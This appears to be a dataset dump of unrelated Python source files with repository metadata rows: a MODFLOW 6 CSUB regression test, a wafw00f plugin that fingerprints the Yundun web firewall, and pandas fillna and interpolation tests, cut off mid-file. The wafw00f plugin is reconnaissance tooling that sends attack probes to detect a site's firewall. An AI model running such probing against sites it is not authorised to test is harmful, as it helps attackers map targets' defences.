if len(args) == 1:
options["origin"] = args[0]
if len(args) == 2:
options["client"] = args[0]
options["server"] = args[1]
cmd = WeaveWdmNext.WeaveWdmNext(options)
cmd.start()
| 33.828571
| 130
| 0.594932
|
78de2df810210edf97d812e13e2fe4619e6d4d86
| 6,066
|
py
|
Python
|
autotest/test_gwf_csub_sub02.py
|
MODFLOW-USGS/modflow6
|
6cc0f91b93e0615b68c9239c32cd5bff7f0696b9
|
[
"CC0-1.0"
] | 102
|
2017-12-19T09:56:38.000Z
|
2022-03-30T01:47:28.000Z
|
autotest/test_gwf_csub_sub02.py
|
MODFLOW-USGS/modflow6
|
6cc0f91b93e0615b68c9239c32cd5bff7f0696b9
|
[
"CC0-1.0"
] | 331
|
2018-01-10T21:22:48.000Z
|
2022-03-29T05:57:00.000Z
|
autotest/test_gwf_csub_sub02.py
|
MODFLOW-USGS/modflow6
|
6cc0f91b93e0615b68c9239c32cd5bff7f0696b9
|
[
"CC0-1.0"
] | 87
|
2017-12-13T21:40:39.000Z
|
2022-03-30T05:31:40.000Z
|
import os
import pytest
try:
import pymake
except:
msg = "Error. Pymake package is not available.\n"
msg += "Try installing using the following command:\n"
msg += " pip install https://github.com/modflowpy/pymake/zipball/master"
raise Exception(msg)
try:
import flopy
except:
msg = "Error. FloPy package is not available.\n"
msg += "Try installing using the following command:\n"
msg += " pip install flopy"
raise Exception(msg)
from framework import testing_framework, running_on_CI
from simulation import Simulation
ex = [
"csub_sub02a",
"csub_sub02b",
"csub_sub02c",
"csub_sub02d",
"csub_sub02e",
]
exdirs = []
for s in ex:
exdirs.append(os.path.join("temp", s))
ddir = "data"
cmppth = "mf6-regression"
cg_ske = 1.14e-3 / (500.0 - 20.0)
cg_S = cg_ske * (500.0 - 20.0)
ss = [cg_S, cg_S, cg_ske, cg_ske, cg_S]
storagecoeff = [True, True, False, False, True]
cdelay = [False, True, False, True, True]
ndelaycells = [None, 19, None, 19, 19]
# run all examples on Travis
continuous_integration = [True for e in ex]
# set replace_exe to None to use default executable
replace_exe = None
# static model data
nlay, nrow, ncol = 1, 1, 1
nper = 10
perlen = [182.625 for i in range(nper)]
nstp = [10 for i in range(nper)]
tsmult = [1.05 for i in range(nper)]
steady = [False for i in range(nper)]
delr, delc = 1000.0, 1000.0
top = -100.0
botm = [-600.0]
strt = 0.0
hnoflo = 1e30
hdry = -1e30
hk = 1e6
laytyp = [0]
sy = 0.0
nouter, ninner = 1000, 300
hclose, rclose, relax = 1e-6, 1e-6, 0.97
tdis_rc = []
for idx in range(nper):
tdis_rc.append((perlen[idx], nstp[idx], tsmult[idx]))
ib = 1
wd = {}
wd6 = {}
for i in range(nper):
if i % 2 == 0:
q = -118.3
else:
q = 23.66
d = [[0, 0, 0, q]]
d6 = [[(0, 0, 0), q]]
wd[i] = d
wd6[i] = d6
# sub data
cc = 0.005
cr = 5e-5
void = 0.82
theta = void / (1.0 + void)
kv = 9.72e-6
sgm = 0.0
sgs = 0.0
ini_stress = 0.0
thick = [20.0]
sfe = cr * thick[0]
sfv = cc * thick[0]
lnd = [0]
ldnd = [0]
dp = [[kv, cr, cc]]
def get_model(idx, ws):
name = ex[idx]
ss = 1.14e-3
sc6 = True
if not storagecoeff[idx]:
ss /= top - botm[0]
sc6 = None
if cdelay[idx]:
cdelays = "delay"
else:
cdelays = "nodelay"
sub6 = [
[
0,
(0, 0, 0),
cdelays,
ini_stress,
thick[0],
1.0,
cc,
cr,
theta,
kv,
0.0,
"db01",
]
]
# build MODFLOW 6 files
sim = flopy.mf6.MFSimulation(
sim_name=name, version="mf6", exe_name="mf6", sim_ws=ws
)
# create tdis package
tdis = flopy.mf6.ModflowTdis(sim, time_units="DAYS", nper=nper, perioddata=tdis_rc)
# create iterative model solution
ims = flopy.mf6.ModflowIms(
sim,
print_option="SUMMARY",
outer_dvclose=hclose,
outer_maximum=nouter,
under_relaxation="NONE",
inner_maximum=ninner,
inner_dvclose=hclose,
rcloserecord=rclose,
linear_acceleration="CG",
scaling_method="NONE",
reordering_method="NONE",
relaxation_factor=relax,
)
# create gwf model
gwf = flopy.mf6.ModflowGwf(
sim, modelname=name, model_nam_file="{}.nam".format(name)
)
dis = flopy.mf6.ModflowGwfdis(
gwf,
nlay=nlay,
nrow=nrow,
ncol=ncol,
delr=delr,
delc=delc,
top=top,
botm=botm,
filename="{}.dis".format(name),
)
# initial conditions
ic = flopy.mf6.ModflowGwfic(gwf, strt=strt, filename="{}.ic".format(name))
# node property flow
npf = flopy.mf6.ModflowGwfnpf(gwf, save_flows=False, icelltype=laytyp, k=hk, k33=hk)
# storage
sto = flopy.mf6.ModflowGwfsto(
gwf,
save_flows=False,
iconvert=laytyp,
ss=0.0,
sy=sy,
storagecoefficient=sc6,
transient={0: True},
)
# wel files
wel = flopy.mf6.ModflowGwfwel(
gwf,
print_input=True,
print_flows=True,
maxbound=1,
stress_period_data=wd6,
save_flows=False,
)
# csub files
csub = flopy.mf6.ModflowGwfcsub(
gwf,
print_input=True,
boundnames=True,
head_based=True,
ndelaycells=ndelaycells[idx],
ninterbeds=1,
beta=0.0,
cg_ske_cr=cg_ske,
packagedata=sub6,
)
# output control
oc = flopy.mf6.ModflowGwfoc(
gwf,
budget_filerecord="{}.cbc".format(name),
head_filerecord="{}.hds".format(name),
headprintrecord=[("COLUMNS", 10, "WIDTH", 15, "DIGITS", 6, "GENERAL")],
saverecord=[("HEAD", "LAST")],
printrecord=[("HEAD", "LAST"), ("BUDGET", "LAST")],
)
return sim
def build_model(idx, dir):
ws = dir
sim = get_model(idx, ws)
ws = os.path.join(dir, cmppth)
mc = get_model(idx, ws)
return sim, mc
# - No need to change any code below
@pytest.mark.parametrize(
"idx, dir",
list(enumerate(exdirs)),
)
def test_mf6model(idx, dir):
# determine if running on Travis or GitHub actions
is_CI = running_on_CI()
# initialize testing framework
test = testing_framework()
# build the models
test.build_mf6_models(build_model, idx, dir)
if is_CI and not continuous_integration[idx]:
return
# run the test model
test.run_mf6(Simulation(dir, mf6_regression=True))
def main():
# initialize testing framework
test = testing_framework()
# run the test model
for dir in exdirs:
test.build_mf6_models(build_model, idx, dir)
sim = Simulation(
dir,
mf6_regression=True,
)
test.run_mf6(sim)
return
# use python test_gwf_csub_sub02.py --mf2005 mf2005devdbl
if __name__ == "__main__":
# print message
print("standalone run of {}".format(os.path.basename(__file__)))
# run main routine
main()
| 21.587189
| 88
| 0.582756
|
99e7947b1f7a4a9ffacb53e759e438f392cd4df6
| 860
|
py
|
Python
|
Worker/WebCheck/wafw00f/plugins/yundun.py
|
p4sschen/Toy4Recon
|
e4fa6a512b238cca6d6d072ed5c66899de60bb06
|
[
"MIT"
] | 1
|
2020-12-16T13:14:05.000Z
|
2020-12-16T13:14:05.000Z
|
Worker/WebCheck/wafw00f/plugins/yundun.py
|
p4sschen/Toy4Recon
|
e4fa6a512b238cca6d6d072ed5c66899de60bb06
|
[
"MIT"
] | null | null | null |
Worker/WebCheck/wafw00f/plugins/yundun.py
|
p4sschen/Toy4Recon
|
e4fa6a512b238cca6d6d072ed5c66899de60bb06
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
NAME = 'Yundun (Yundun)'
def is_waf(self):
# Yundun has its own server header set
if self.matchheader(('Server', 'YUNDUN')):
return True
# X-Cache too sometimes
if self.matchheader(('X-Cache', 'YUNDUN')):
return True
# Found more fingerprints for Yundun during testing phase
if self.matchcookie(r'^yd_cookie='):
return True
for attack in self.attacks:
r = attack(self)
if r is None:
return
_, page = r
# Yundun has its nice characteristic blockpage. Found this new unique fingerprint
# while in testing phase
if any(i in page for i in (b'Blocked by YUNDUN Cloud WAF', b'yundun.com/yd_http_error/',
b'www.yundun.com/static/js/fingerprint2.js')):
return True
return False
| 30.714286
| 96
| 0.601163
|
7174283494fe7547add9ca626c1d3283e31a77b7
| 43,414
|
py
|
Python
|
pandas/tests/series/test_missing.py
|
lorenzocestaro/pandas
|
a73e4518cf3d10fd239cdbd1be3bcda43443bf2a
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause"
] | null | null | null |
pandas/tests/series/test_missing.py
|
lorenzocestaro/pandas
|
a73e4518cf3d10fd239cdbd1be3bcda43443bf2a
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause"
] | null | null | null |
pandas/tests/series/test_missing.py
|
lorenzocestaro/pandas
|
a73e4518cf3d10fd239cdbd1be3bcda43443bf2a
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause"
] | null | null | null |
# coding=utf-8
# pylint: disable-msg=E1101,W0612
import pytz
from datetime import timedelta, datetime
from distutils.version import LooseVersion
from numpy import nan
import numpy as np
import pandas as pd
from pandas import (Series, DataFrame, isnull, date_range,
MultiIndex, Index, Timestamp, NaT)
from pandas.compat import range
from pandas._libs.tslib import iNaT
from pandas.util.testing import assert_series_equal, assert_frame_equal
import pandas.util.testing as tm
from .common import TestData
try:
import scipy
_is_scipy_ge_0190 = scipy.__version__ >= LooseVersion('0.19.0')
except:
_is_scipy_ge_0190 = False
def _skip_if_no_pchip():
try:
from scipy.interpolate import pchip_interpolate # noqa
except ImportError:
import pytest
pytest.skip('scipy.interpolate.pchip missing')
def _skip_if_no_akima():
try:
from scipy.interpolate import Akima1DInterpolator # noqa
except ImportError:
import pytest
pytest.skip('scipy.interpolate.Akima1DInterpolator missing')
def _simple_ts(start, end, freq='D'):
rng = date_range(start, end, freq=freq)
return Series(np.random.randn(len(rng)), index=rng)
class TestSeriesMissingData(TestData, tm.TestCase):
def test_timedelta_fillna(self):
# GH 3371
s = Series([Timestamp('20130101'), Timestamp('20130101'), Timestamp(
'20130102'), Timestamp('20130103 9:01:01')])
td = s.diff()
# reg fillna
result = td.fillna(0)
expected = Series([timedelta(0), timedelta(0), timedelta(1), timedelta(
days=1, seconds=9 * 3600 + 60 + 1)])
assert_series_equal(result, expected)
# interprested as seconds
result = td.fillna(1)
expected = Series([timedelta(seconds=1), timedelta(0), timedelta(1),
timedelta(days=1, seconds=9 * 3600 + 60 + 1)])
assert_series_equal(result, expected)
result = td.fillna(timedelta(days=1, seconds=1))
expected = Series([timedelta(days=1, seconds=1), timedelta(
0), timedelta(1), timedelta(days=1, seconds=9 * 3600 + 60 + 1)])
assert_series_equal(result, expected)
result = td.fillna(np.timedelta64(int(1e9)))
expected = Series([timedelta(seconds=1), timedelta(0), timedelta(1),
timedelta(days=1, seconds=9 * 3600 + 60 + 1)])
assert_series_equal(result, expected)
result = td.fillna(NaT)
expected = Series([NaT, timedelta(0), timedelta(1),
timedelta(days=1, seconds=9 * 3600 + 60 + 1)],
dtype='m8[ns]')
assert_series_equal(result, expected)
# ffill
td[2] = np.nan
result = td.ffill()
expected = td.fillna(0)
expected[0] = np.nan
assert_series_equal(result, expected)
# bfill
td[2] = np.nan
result = td.bfill()
expected = td.fillna(0)
expected[2] = timedelta(days=1, seconds=9 * 3600 + 60 + 1)
assert_series_equal(result, expected)
def test_datetime64_fillna(self):
s = Series([Timestamp('20130101'), Timestamp('20130101'), Timestamp(
'20130102'), Timestamp('20130103 9:01:01')])
s[2] = np.nan
# reg fillna
result = s.fillna(Timestamp('20130104'))
expected = Series([Timestamp('20130101'), Timestamp(
'20130101'), Timestamp('20130104'), Timestamp('20130103 9:01:01')])
assert_series_equal(result, expected)
result = s.fillna(NaT)
expected = s
assert_series_equal(result, expected)
# ffill
result = s.ffill()
expected = Series([Timestamp('20130101'), Timestamp(
'20130101'), Timestamp('20130101'), Timestamp('20130103 9:01:01')])
assert_series_equal(result, expected)
# bfill
result = s.bfill()
expected = Series([Timestamp('20130101'), Timestamp('20130101'),
Timestamp('20130103 9:01:01'), Timestamp(
'20130103 9:01:01')])
assert_series_equal(result, expected)
# GH 6587
# make sure that we are treating as integer when filling
# this also tests inference of a datetime-like with NaT's
s = Series([pd.NaT, pd.NaT, '2013-08-05 15:30:00.000001'])
expected = Series(
['2013-08-05 15:30:00.000001', '2013-08-05 15:30:00.000001',
'2013-08-05 15:30:00.000001'], dtype='M8[ns]')
result = s.fillna(method='backfill')
assert_series_equal(result, expected)
def test_datetime64_tz_fillna(self):
for tz in ['US/Eastern', 'Asia/Tokyo']:
# DatetimeBlock
s = Series([Timestamp('2011-01-01 10:00'), pd.NaT,
Timestamp('2011-01-03 10:00'), pd.NaT])
null_loc = pd.Series([False, True, False, True])
result = s.fillna(pd.Timestamp('2011-01-02 10:00'))
expected = Series([Timestamp('2011-01-01 10:00'),
Timestamp('2011-01-02 10:00'),
Timestamp('2011-01-03 10:00'),
Timestamp('2011-01-02 10:00')])
self.assert_series_equal(expected, result)
# check s is not changed
self.assert_series_equal(pd.isnull(s), null_loc)
result = s.fillna(pd.Timestamp('2011-01-02 10:00', tz=tz))
expected = Series([Timestamp('2011-01-01 10:00'),
Timestamp('2011-01-02 10:00', tz=tz),
Timestamp('2011-01-03 10:00'),
Timestamp('2011-01-02 10:00', tz=tz)])
self.assert_series_equal(expected, result)
self.assert_series_equal(pd.isnull(s), null_loc)
result = s.fillna('AAA')
expected = Series([Timestamp('2011-01-01 10:00'), 'AAA',
Timestamp('2011-01-03 10:00'), 'AAA'],
dtype=object)
self.assert_series_equal(expected, result)
self.assert_series_equal(pd.isnull(s), null_loc)
result = s.fillna({1: pd.Timestamp('2011-01-02 10:00', tz=tz),
3: pd.Timestamp('2011-01-04 10:00')})
expected = Series([Timestamp('2011-01-01 10:00'),
Timestamp('2011-01-02 10:00', tz=tz),
Timestamp('2011-01-03 10:00'),
Timestamp('2011-01-04 10:00')])
self.assert_series_equal(expected, result)
self.assert_series_equal(pd.isnull(s), null_loc)
result = s.fillna({1: pd.Timestamp('2011-01-02 10:00'),
3: pd.Timestamp('2011-01-04 10:00')})
expected = Series([Timestamp('2011-01-01 10:00'),
Timestamp('2011-01-02 10:00'),
Timestamp('2011-01-03 10:00'),
Timestamp('2011-01-04 10:00')])
self.assert_series_equal(expected, result)
self.assert_series_equal(pd.isnull(s), null_loc)
# DatetimeBlockTZ
idx = pd.DatetimeIndex(['2011-01-01 10:00', pd.NaT,
'2011-01-03 10:00', pd.NaT], tz=tz)
s = pd.Series(idx)
self.assertEqual(s.dtype, 'datetime64[ns, {0}]'.format(tz))
self.assert_series_equal(pd.isnull(s), null_loc)
result = s.fillna(pd.Timestamp('2011-01-02 10:00'))
expected = Series([Timestamp('2011-01-01 10:00', tz=tz),
Timestamp('2011-01-02 10:00'),
Timestamp('2011-01-03 10:00', tz=tz),
Timestamp('2011-01-02 10:00')])
self.assert_series_equal(expected, result)
self.assert_series_equal(pd.isnull(s), null_loc)
result = s.fillna(pd.Timestamp('2011-01-02 10:00', tz=tz))
idx = pd.DatetimeIndex(['2011-01-01 10:00', '2011-01-02 10:00',
'2011-01-03 10:00', '2011-01-02 10:00'],
tz=tz)
expected = Series(idx)
self.assert_series_equal(expected, result)
self.assert_series_equal(pd.isnull(s), null_loc)
result = s.fillna(pd.Timestamp('2011-01-02 10:00',
tz=tz).to_pydatetime())
idx = pd.DatetimeIndex(['2011-01-01 10:00', '2011-01-02 10:00',
'2011-01-03 10:00', '2011-01-02 10:00'],
tz=tz)
expected = Series(idx)
self.assert_series_equal(expected, result)
self.assert_series_equal(pd.isnull(s), null_loc)
result = s.fillna('AAA')
expected = Series([Timestamp('2011-01-01 10:00', tz=tz), 'AAA',
Timestamp('2011-01-03 10:00', tz=tz), 'AAA'],
dtype=object)
self.assert_series_equal(expected, result)
self.assert_series_equal(pd.isnull(s), null_loc)
result = s.fillna({1: pd.Timestamp('2011-01-02 10:00', tz=tz),
3: pd.Timestamp('2011-01-04 10:00')})
expected = Series([Timestamp('2011-01-01 10:00', tz=tz),
Timestamp('2011-01-02 10:00', tz=tz),
Timestamp('2011-01-03 10:00', tz=tz),
Timestamp('2011-01-04 10:00')])
self.assert_series_equal(expected, result)
self.assert_series_equal(pd.isnull(s), null_loc)
result = s.fillna({1: pd.Timestamp('2011-01-02 10:00', tz=tz),
3: pd.Timestamp('2011-01-04 10:00', tz=tz)})
expected = Series([Timestamp('2011-01-01 10:00', tz=tz),
Timestamp('2011-01-02 10:00', tz=tz),
Timestamp('2011-01-03 10:00', tz=tz),
Timestamp('2011-01-04 10:00', tz=tz)])
self.assert_series_equal(expected, result)
self.assert_series_equal(pd.isnull(s), null_loc)
# filling with a naive/other zone, coerce to object
result = s.fillna(Timestamp('20130101'))
expected = Series([Timestamp('2011-01-01 10:00', tz=tz),
Timestamp('2013-01-01'),
Timestamp('2011-01-03 10:00', tz=tz),
Timestamp('2013-01-01')])
self.assert_series_equal(expected, result)
self.assert_series_equal(pd.isnull(s), null_loc)
result = s.fillna(Timestamp('20130101', tz='US/Pacific'))
expected = Series([Timestamp('2011-01-01 10:00', tz=tz),
Timestamp('2013-01-01', tz='US/Pacific'),
Timestamp('2011-01-03 10:00', tz=tz),
Timestamp('2013-01-01', tz='US/Pacific')])
self.assert_series_equal(expected, result)
self.assert_series_equal(pd.isnull(s), null_loc)
def test_datetime64tz_fillna_round_issue(self):
# GH 14872
data = pd.Series([pd.NaT, pd.NaT,
datetime(2016, 12, 12, 22, 24, 6, 100001,
tzinfo=pytz.utc)])
filled = data.fillna(method='bfill')
expected = pd.Series([datetime(2016, 12, 12, 22, 24, 6,
100001, tzinfo=pytz.utc),
datetime(2016, 12, 12, 22, 24, 6,
100001, tzinfo=pytz.utc),
datetime(2016, 12, 12, 22, 24, 6,
100001, tzinfo=pytz.utc)])
assert_series_equal(filled, expected)
def test_fillna_downcast(self):
# GH 15277
# infer int64 from float64
s = pd.Series([1., np.nan])
result = s.fillna(0, downcast='infer')
expected = pd.Series([1, 0])
assert_series_equal(result, expected)
# infer int64 from float64 when fillna value is a dict
s = pd.Series([1., np.nan])
result = s.fillna({1: 0}, downcast='infer')
expected = pd.Series([1, 0])
assert_series_equal(result, expected)
def test_fillna_int(self):
s = Series(np.random.randint(-100, 100, 50))
s.fillna(method='ffill', inplace=True)
assert_series_equal(s.fillna(method='ffill', inplace=False), s)
def test_fillna_raise(self):
s = Series(np.random.randint(-100, 100, 50))
self.assertRaises(TypeError, s.fillna, [1, 2])
self.assertRaises(TypeError, s.fillna, (1, 2))
# related GH 9217, make sure limit is an int and greater than 0
s = Series([1, 2, 3, None])
for limit in [-1, 0, 1., 2.]:
for method in ['backfill', 'bfill', 'pad', 'ffill', None]:
with tm.assertRaises(ValueError):
s.fillna(1, limit=limit, method=method)
def test_fillna_nat(self):
series = Series([0, 1, 2, iNaT], dtype='M8[ns]')
filled = series.fillna(method='pad')
filled2 = series.fillna(value=series.values[2])
expected = series.copy()
expected.values[3] = expected.values[2]
assert_series_equal(filled, expected)
assert_series_equal(filled2, expected)
df = DataFrame({'A': series})
filled = df.fillna(method='pad')
filled2 = df.fillna(value=series.values[2])
expected = DataFrame({'A': expected})
assert_frame_equal(filled, expected)
assert_frame_equal(filled2, expected)
series = Series([iNaT, 0, 1, 2], dtype='M8[ns]')
filled = series.fillna(method='bfill')
filled2 = series.fillna(value=series[1])
expected = series.copy()
expected[0] = expected[1]
assert_series_equal(filled, expected)
assert_series_equal(filled2, expected)
df = DataFrame({'A': series})
filled = df.fillna(method='bfill')
filled2 = df.fillna(value=series[1])
expected = DataFrame({'A': expected})
assert_frame_equal(filled, expected)
assert_frame_equal(filled2, expected)
def test_isnull_for_inf(self):
s = Series(['a', np.inf, np.nan, 1.0])
with pd.option_context('mode.use_inf_as_null', True):
r = s.isnull()
dr = s.dropna()
e = Series([False, True, True, False])
de = Series(['a', 1.0], index=[0, 3])
tm.assert_series_equal(r, e)
tm.assert_series_equal(dr, de)
def test_fillna(self):
ts = Series([0., 1., 2., 3., 4.], index=tm.makeDateIndex(5))
self.assert_series_equal(ts, ts.fillna(method='ffill'))
ts[2] = np.NaN
exp = Series([0., 1., 1., 3., 4.], index=ts.index)
self.assert_series_equal(ts.fillna(method='ffill'), exp)
exp = Series([0., 1., 3., 3., 4.], index=ts.index)
self.assert_series_equal(ts.fillna(method='backfill'), exp)
exp = Series([0., 1., 5., 3., 4.], index=ts.index)
self.assert_series_equal(ts.fillna(value=5), exp)
self.assertRaises(ValueError, ts.fillna)
self.assertRaises(ValueError, self.ts.fillna, value=0, method='ffill')
# GH 5703
s1 = Series([np.nan])
s2 = Series([1])
result = s1.fillna(s2)
expected = Series([1.])
assert_series_equal(result, expected)
result = s1.fillna({})
assert_series_equal(result, s1)
result = s1.fillna(Series(()))
assert_series_equal(result, s1)
result = s2.fillna(s1)
assert_series_equal(result, s2)
result = s1.fillna({0: 1})
assert_series_equal(result, expected)
result = s1.fillna({1: 1})
assert_series_equal(result, Series([np.nan]))
result = s1.fillna({0: 1, 1: 1})
assert_series_equal(result, expected)
result = s1.fillna(Series({0: 1, 1: 1}))
assert_series_equal(result, expected)
result = s1.fillna(Series({0: 1, 1: 1}, index=[4, 5]))
assert_series_equal(result, s1)
s1 = Series([0, 1, 2], list('abc'))
s2 = Series([0, np.nan, 2], list('bac'))
result = s2.fillna(s1)
expected = Series([0, 0, 2.], list('bac'))
assert_series_equal(result, expected)
# limit
s = Series(np.nan, index=[0, 1, 2])
result = s.fillna(999, limit=1)
expected = Series([999, np.nan, np.nan], index=[0, 1, 2])
assert_series_equal(result, expected)
result = s.fillna(999, limit=2)
expected = Series([999, 999, np.nan], index=[0, 1, 2])
assert_series_equal(result, expected)
# GH 9043
# make sure a string representation of int/float values can be filled
# correctly without raising errors or being converted
vals = ['0', '1.5', '-0.3']
for val in vals:
s = Series([0, 1, np.nan, np.nan, 4], dtype='float64')
result = s.fillna(val)
expected = Series([0, 1, val, val, 4], dtype='object')
assert_series_equal(result, expected)
def test_fillna_bug(self):
x = Series([nan, 1., nan, 3., nan], ['z', 'a', 'b', 'c', 'd'])
filled = x.fillna(method='ffill')
expected = Series([nan, 1., 1., 3., 3.], x.index)
assert_series_equal(filled, expected)
filled = x.fillna(method='bfill')
expected = Series([1., 1., 3., 3., nan], x.index)
assert_series_equal(filled, expected)
def test_fillna_inplace(self):
x = Series([nan, 1., nan, 3., nan], ['z', 'a', 'b', 'c', 'd'])
y = x.copy()
y.fillna(value=0, inplace=True)
expected = x.fillna(value=0)
assert_series_equal(y, expected)
def test_fillna_invalid_method(self):
try:
self.ts.fillna(method='ffil')
except ValueError as inst:
self.assertIn('ffil', str(inst))
def test_ffill(self):
ts = Series([0., 1., 2., 3., 4.], index=tm.makeDateIndex(5))
ts[2] = np.NaN
assert_series_equal(ts.ffill(), ts.fillna(method='ffill'))
def test_ffill_mixed_dtypes_without_missing_data(self):
# GH14956
series = pd.Series([datetime(2015, 1, 1, tzinfo=pytz.utc), 1])
result = series.ffill()
assert_series_equal(series, result)
def test_bfill(self):
ts = Series([0., 1., 2., 3., 4.], index=tm.makeDateIndex(5))
ts[2] = np.NaN
assert_series_equal(ts.bfill(), ts.fillna(method='bfill'))
def test_timedelta64_nan(self):
td = Series([timedelta(days=i) for i in range(10)])
# nan ops on timedeltas
td1 = td.copy()
td1[0] = np.nan
self.assertTrue(isnull(td1[0]))
self.assertEqual(td1[0].value, iNaT)
td1[0] = td[0]
self.assertFalse(isnull(td1[0]))
td1[1] = iNaT
self.assertTrue(isnull(td1[1]))
self.assertEqual(td1[1].value, iNaT)
td1[1] = td[1]
self.assertFalse(isnull(td1[1]))
td1[2] = NaT
self.assertTrue(isnull(td1[2]))
self.assertEqual(td1[2].value, iNaT)
td1[2] = td[2]
self.assertFalse(isnull(td1[2]))
# boolean setting
# this doesn't work, not sure numpy even supports it
# result = td[(td>np.timedelta64(timedelta(days=3))) &
# td<np.timedelta64(timedelta(days=7)))] = np.nan
# self.assertEqual(isnull(result).sum(), 7)
# NumPy limitiation =(
# def test_logical_range_select(self):
# np.random.seed(12345)
# selector = -0.5 <= self.ts <= 0.5
# expected = (self.ts >= -0.5) & (self.ts <= 0.5)
# assert_series_equal(selector, expected)
def test_dropna_empty(self):
s = Series([])
self.assertEqual(len(s.dropna()), 0)
s.dropna(inplace=True)
self.assertEqual(len(s), 0)
# invalid axis
self.assertRaises(ValueError, s.dropna, axis=1)
def test_datetime64_tz_dropna(self):
# DatetimeBlock
s = Series([Timestamp('2011-01-01 10:00'), pd.NaT, Timestamp(
'2011-01-03 10:00'), pd.NaT])
result = s.dropna()
expected = Series([Timestamp('2011-01-01 10:00'),
Timestamp('2011-01-03 10:00')], index=[0, 2])
self.assert_series_equal(result, expected)
# DatetimeBlockTZ
idx = pd.DatetimeIndex(['2011-01-01 10:00', pd.NaT,
'2011-01-03 10:00', pd.NaT],
tz='Asia/Tokyo')
s = pd.Series(idx)
self.assertEqual(s.dtype, 'datetime64[ns, Asia/Tokyo]')
result = s.dropna()
expected = Series([Timestamp('2011-01-01 10:00', tz='Asia/Tokyo'),
Timestamp('2011-01-03 10:00', tz='Asia/Tokyo')],
index=[0, 2])
self.assertEqual(result.dtype, 'datetime64[ns, Asia/Tokyo]')
self.assert_series_equal(result, expected)
def test_dropna_no_nan(self):
for s in [Series([1, 2, 3], name='x'), Series(
[False, True, False], name='x')]:
result = s.dropna()
self.assert_series_equal(result, s)
self.assertFalse(result is s)
s2 = s.copy()
s2.dropna(inplace=True)
self.assert_series_equal(s2, s)
def test_valid(self):
ts = self.ts.copy()
ts[::2] = np.NaN
result = ts.valid()
self.assertEqual(len(result), ts.count())
tm.assert_series_equal(result, ts[1::2])
tm.assert_series_equal(result, ts[pd.notnull(ts)])
def test_isnull(self):
ser = Series([0, 5.4, 3, nan, -0.001])
np.array_equal(ser.isnull(),
Series([False, False, False, True, False]).values)
ser = Series(["hi", "", nan])
np.array_equal(ser.isnull(), Series([False, False, True]).values)
def test_notnull(self):
ser = Series([0, 5.4, 3, nan, -0.001])
np.array_equal(ser.notnull(),
Series([True, True, True, False, True]).values)
ser = Series(["hi", "", nan])
np.array_equal(ser.notnull(), Series([True, True, False]).values)
def test_pad_nan(self):
x = Series([np.nan, 1., np.nan, 3., np.nan], ['z', 'a', 'b', 'c', 'd'],
dtype=float)
x.fillna(method='pad', inplace=True)
expected = Series([np.nan, 1.0, 1.0, 3.0, 3.0],
['z', 'a', 'b', 'c', 'd'], dtype=float)
assert_series_equal(x[1:], expected[1:])
self.assertTrue(np.isnan(x[0]), np.isnan(expected[0]))
def test_pad_require_monotonicity(self):
rng = date_range('1/1/2000', '3/1/2000', freq='B')
# neither monotonic increasing or decreasing
rng2 = rng[[1, 0, 2]]
self.assertRaises(ValueError, rng2.get_indexer, rng, method='pad')
def test_dropna_preserve_name(self):
self.ts[:5] = np.nan
result = self.ts.dropna()
self.assertEqual(result.name, self.ts.name)
name = self.ts.name
ts = self.ts.copy()
ts.dropna(inplace=True)
self.assertEqual(ts.name, name)
def test_fill_value_when_combine_const(self):
# GH12723
s = Series([0, 1, np.nan, 3, 4, 5])
exp = s.fillna(0).add(2)
res = s.add(2, fill_value=0)
assert_series_equal(res, exp)
def test_series_fillna_limit(self):
index = np.arange(10)
s = Series(np.random.randn(10), index=index)
result = s[:2].reindex(index)
result = result.fillna(method='pad', limit=5)
expected = s[:2].reindex(index).fillna(method='pad')
expected[-3:] = np.nan
assert_series_equal(result, expected)
result = s[-2:].reindex(index)
result = result.fillna(method='bfill', limit=5)
expected = s[-2:].reindex(index).fillna(method='backfill')
expected[:3] = np.nan
assert_series_equal(result, expected)
def test_sparse_series_fillna_limit(self):
index = np.arange(10)
s = Series(np.random.randn(10), index=index)
ss = s[:2].reindex(index).to_sparse()
result = ss.fillna(method='pad', limit=5)
expected = ss.fillna(method='pad', limit=5)
expected = expected.to_dense()
expected[-3:] = np.nan
expected = expected.to_sparse()
assert_series_equal(result, expected)
ss = s[-2:].reindex(index).to_sparse()
result = ss.fillna(method='backfill', limit=5)
expected = ss.fillna(method='backfill')
expected = expected.to_dense()
expected[:3] = np.nan
expected = expected.to_sparse()
assert_series_equal(result, expected)
def test_sparse_series_pad_backfill_limit(self):
index = np.arange(10)
s = Series(np.random.randn(10), index=index)
s = s.to_sparse()
result = s[:2].reindex(index, method='pad', limit=5)
expected = s[:2].reindex(index).fillna(method='pad')
expected = expected.to_dense()
expected[-3:] = np.nan
expected = expected.to_sparse()
assert_series_equal(result, expected)
result = s[-2:].reindex(index, method='backfill', limit=5)
expected = s[-2:].reindex(index).fillna(method='backfill')
expected = expected.to_dense()
expected[:3] = np.nan
expected = expected.to_sparse()
assert_series_equal(result, expected)
def test_series_pad_backfill_limit(self):
index = np.arange(10)
s = Series(np.random.randn(10), index=index)
result = s[:2].reindex(index, method='pad', limit=5)
expected = s[:2].reindex(index).fillna(method='pad')
expected[-3:] = np.nan
assert_series_equal(result, expected)
result = s[-2:].reindex(index, method='backfill', limit=5)
expected = s[-2:].reindex(index).fillna(method='backfill')
expected[:3] = np.nan
assert_series_equal(result, expected)
class TestSeriesInterpolateData(TestData, tm.TestCase):
def test_interpolate(self):
ts = Series(np.arange(len(self.ts), dtype=float), self.ts.index)
ts_copy = ts.copy()
ts_copy[5:10] = np.NaN
linear_interp = ts_copy.interpolate(method='linear')
self.assert_series_equal(linear_interp, ts)
ord_ts = Series([d.toordinal() for d in self.ts.index],
index=self.ts.index).astype(float)
ord_ts_copy = ord_ts.copy()
ord_ts_copy[5:10] = np.NaN
time_interp = ord_ts_copy.interpolate(method='time')
self.assert_series_equal(time_interp, ord_ts)
# try time interpolation on a non-TimeSeries
# Only raises ValueError if there are NaNs.
non_ts = self.series.copy()
non_ts[0] = np.NaN
self.assertRaises(ValueError, non_ts.interpolate, method='time')
def test_interpolate_pchip(self):
tm._skip_if_no_scipy()
_skip_if_no_pchip()
ser = Series(np.sort(np.random.uniform(size=100)))
# interpolate at new_index
